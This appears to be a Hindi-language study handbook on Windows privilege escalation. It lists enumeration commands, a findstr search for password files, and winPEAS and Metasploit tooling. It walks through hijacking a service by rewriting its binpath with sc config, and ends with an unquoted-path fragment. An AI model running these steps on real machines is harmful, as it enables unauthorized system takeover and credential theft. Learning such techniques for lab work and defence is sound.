
विंडोज़ विशेषाधिकार वृद्धि (Privilege Escalation) अवधारणाओं के लिए मेरी हैंडबुक। मेरी प्लेलिस्ट ज़रूर देखें, लिंक: https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
ध्यान देने योग्य एक महत्वपूर्ण बात है Groups, Administrator समूह का कोई भी उपयोगकर्ता हमें एस्केलेट करने में मदद करता है!
whoami /priv - वर्तमान उपयोगकर्ता के विशेषाधिकारnet users - सभी उपयोगकर्ताओं की सूचीnet user <username> - किसी विशिष्ट उपयोगकर्ता का विवरणqwinsta - अन्य उपयोगकर्ता जो एक साथ लॉग इन हैंnet localgroup - सिस्टम में उपलब्ध समूहnet localgroup <group-name> - किसी विशिष्ट समूह के सदस्यों की सूचीsysteminfo - OS के बारे में सभी जानकारी देता हैhostname - सिस्टम का होस्टनामfindstr /si password *.txt - हम उन फ़ाइलों की तलाश कर रहे हैं जिनमें 'password' शामिल है, वह भी टेक्स्ट फ़ाइलों मेंwmic qfe get Caption,Description,HotFixID,InstalledOn - यह सुरक्षा पैच और संबंधित जानकारी के बारे में बताता हैnetstat -ano - मशीन से जुड़े कनेक्शनschtasks /query /fo LIST /v - किसी भी निर्धारित कार्य को देखने के लिएdriverquery - ड्राइवर से संबंधित जानकारी की सूचीsc query windefend - एंटीवायरस सेवा की जाँच करता हैsysteminfo उपकरण के आउटपुट की एक कॉपी अपनी मशीन पर रखें और यही इस उपकरण के लिए एकमात्र आवश्यकता हैwmic product get name,version,vendor - यह उत्पाद का नाम, संस्करण और विक्रेता देता है। यह विशेष कमांड हमें जो चाहिए उसका उचित दृश्य प्रदान करता है।wmic service list brief | findstr "Running" का उपयोग करें और सेवा के बारे में अधिक जानकारी प्राप्त करने के लिए sc qc <ServiceName> का उपयोग करेंpost/multi/recon/local_exploit_suggester नामक मॉड्यूल चलाएँ, सुनिश्चित करें कि आपका सेशन बैकग्राउंड में है ताकि यह टूल ठीक से काम करे या आप इसे meterpreter से भी लोड कर सकते हैं।winpeas.exe --help चलाकर सभी विकल्प देखेंsysteminfo कमांड चलाकर सिस्टम की जानकारी प्राप्त करें और उसे किसी फ़ाइल में कॉपी करें तथा उसे .txt एक्सटेंशन के साथ नाम देंयहाँ हम असुरक्षित अनुमतियों वाली सेवाओं की पहचान करने की कोशिश करेंगे और फिर उन्हें एक्सप्लॉइट करने का प्रयास कर सकते हैं।
यहाँ हम winpeas.exe servicesinfo कमांड का उपयोग कर सकते हैं और उन सेवाओं को देख सकते हैं जो काफी सहायक होती हैं
आउटपुट का एक दिलचस्प हिस्सा इस प्रकार है,```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
- लेकिन अधिक जानकारी प्राप्त करने के लिए हम **accesschk** नामक एक टूल का उपयोग कर सकते हैं जो Microsoft द्वारा है, इसे इस प्रकार चलाएँ `accesschk.exe /accepteula -uwcqv <current-user> <service>`, आउटपुट है,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config है जहाँ हम सेवा का कॉन्फ़िगरेशन बदल सकते हैं।sc qc <service> चलाएँ और फिर Binary_path_name (इसे binpath भी कहा जाता है) नोट करें, जिसे हम बदलने वाले हैं (बुरी मुस्कान)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" चलाएँ और फिर सेवा शुरू करें sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.